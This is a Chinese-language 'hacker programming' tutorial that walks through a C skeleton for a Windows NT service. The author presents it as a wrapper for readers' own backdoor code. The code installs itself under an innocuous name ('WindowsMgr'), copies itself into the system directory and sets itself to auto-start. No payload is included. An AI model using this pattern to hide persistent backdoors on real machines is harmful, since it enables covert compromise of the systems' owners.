黑客编程教程（八）编写NT服务

先介绍一下什么是NT服务,实际上就是一个可以在系统启动时自动在一定身份下启动的,伴随着系统长期存在的进程.
  
   一个NT服务有三部分构成:
   1:Service Control Manager(SCM) 每个WIN NT/2K都有一个SCM,他存在于Service.exe中.
   2:服务本身 一个服务拥有能从SCM受到信号和命令所必需的特殊代码,并能够在处理后将他的状态返回SCM.
   3:Service Control Dispatcher(SCP) 他是一个拥有用户截面,允许用户开始,暂停,继续,并且控制已经安装在计算机上作为服务运行的WIN32
  应用程序

下面我们来看编写一个NT服务:(这是一个服务框架,只要在他后面添加自己的后门代码,那么后门就可以实现服务方式启动)
请大家对照注释仔细研究!

#include <stdio.h>
 #include <windows.h>
 SERVICE_STATUS m_ServiceStatus;
 SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
 BOOL bRunning=true;
 void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);                         //服务主函数
void WINAPI ServiceCtrlHandler(DWORD Opcode);                               //服务控制函数
void WINAPI CmdStart(void);        //要启动的程序函数
BOOL InstallService();         //安装服务的函数
BOOL DeleteService();          //删除服务的函数

int main(int argc, char* argv[])
 {
  printf("	windows based service demo
");
  printf("	gxisone@hotmail.com
");
     if(argc!=3)
  {
   printf("usage: %s -install[remove]",argv[0]);
   return 0;
  }
   if(strcmp(argv[1],"-install")==0)                            //安装
  {
    if(InstallService())
     printf("

Service Installed Sucessfully
");
    else
     printf("

Error Installing Service
");
   }
  else if(strcmp(argv[1],"-remove")==0)                                 // 删除
  {
    if(DeleteService())
     printf("

Service remove sucessfully
");
    else
     printf("

Error removing Service
");
   }
   else
   {
    printf("
usage: %s -install[remove]
",argv[0]);
    return 0;
   }
          //在进入点函数里面要完成ServiceMain的初始化，
         //准确点说是初始化一个SERVICE_TABLE_ENTRY结构数组，
        //这个结构记录了这个服务程序里面所包含的所有服务的名称
       //和服务的进入点函数
SERVICE_TABLE_ENTRY
 DispatchTable[]={{"WindowsMgr",ServiceMain},{NULL,NULL}};
          //最后的NULL指明数组的结束
   StartServiceCtrlDispatcher(DispatchTable);
   return 0;
 }

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
 {
  m_ServiceStatus.dwServiceType = SERVICE_WIN32;
  m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
  m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
  m_ServiceStatus.dwWin32ExitCode = 0;
  m_ServiceStatus.dwServiceSpecificExitCode = 0;
  m_ServiceStatus.dwCheckPoint = 0;
  m_ServiceStatus.dwWaitHint = 0;
  m_ServiceStatusHandle = RegisterServiceCtrlHandler("WindowsMgr",ServiceCtrlHandler);
  if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)return;
  m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;      //设置服务状态
 m_ServiceStatus.dwCheckPoint = 0;
  m_ServiceStatus.dwWaitHint = 0;
        //SERVICE_STATUS结构含有七个成员，它们反映服务的现行状态。
      //所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置
SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
   bRunning=true;
  //*
     CmdStart();        //启动我们的服务程序
 //*
  return;
 }
 void WINAPI ServiceCtrlHandler(DWORD Opcode)     //服务控制函数
{
  switch(Opcode)
  {
  case SERVICE_CONTROL_PAUSE:   
   m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
   break;
  case SERVICE_CONTROL_CONTINUE: 
   m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   break;
  case SERVICE_CONTROL_STOP:  
   m_ServiceStatus.dwWin32ExitCode = 0;
   m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
   m_ServiceStatus.dwCheckPoint = 0;
   m_ServiceStatus.dwWaitHint = 0;
   SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
   bRunning=false;
   break;
  case SERVICE_CONTROL_INTERROGATE:
   break;
  }
  return;
 }
 BOOL InstallService()         //安装服务函数
{
  char strDir[1024];
  SC_HANDLE schSCManager,schService;
  GetCurrentDirectory(1024,strDir);
  GetModuleFileName(NULL,strDir,sizeof(strDir));

 char chSysPath[1024];
  GetSystemDirectory(chSysPath,sizeof(chSysPath));

 strcat(chSysPath,"\WindowsMgr.exe");
 if(!CopyFile(strDir,chSysPath,FALSE))printf("Copy file OK
");                    // 把我们的服务程序复制到系统根目录

 strcpy(strDir,chSysPath);
 schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  if (schSCManager == NULL)
  {
   printf("open scmanger failed,maybe you do not have the privilage to do this
");
   return false;
  }

 LPCTSTR lpszBinaryPathName=strDir;
  
  schService = CreateService(schSCManager,"WindowsMgr","Windows Manger Control", //将服务的信息添加到SCM的数据库
  SERVICE_ALL_ACCESS,
   SERVICE_WIN32_OWN_PROCESS, // 服务类型
  SERVICE_AUTO_START, // 启动类型
  SERVICE_ERROR_NORMAL, 
   lpszBinaryPathName, // 服务名
  NULL,
   NULL,
   NULL,
   NULL,
   NULL);

  if (schService == NULL)
  {
   printf("faint,we failed just because we invoke createservices failed
");
   return false;
  }
  CloseServiceHandle(schService);
  return true;
 }
 BOOL DeleteService()
 {
  SC_HANDLE schSCManager;
  SC_HANDLE hService;
  schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

    char chSysPath[1024];
  GetSystemDirectory(chSysPath,sizeof(chSysPath));
     strcat(chSysPath,"\WindowsMgr.exe");

 if (schSCManager == NULL)
  {
   printf("faint,open scmanger failed
");
   return false;
  }
  hService=OpenService(schSCManager,"WindowsMgr",SERVICE_ALL_ACCESS);
  if (hService == NULL)
  {
   printf("faint,open services failt
");
   return false;
  }
     if(DeleteFile(chSysPath)==0)
   {
    printf("Dell file Failure !
");              
    return false;
   }
  else printf("Delete file OK!
");
  if(DeleteService(hService)==0)
   return false;
    
  if(CloseServiceHandle(hService)==0)
   return false;
  else
   return true;
 }

void WINAPI CmdStart(void)
 {
           
           //把你的要做成服务启动的程序代码添加到这里
          //那么你的代码就可以作为NT服务启动了
         
 }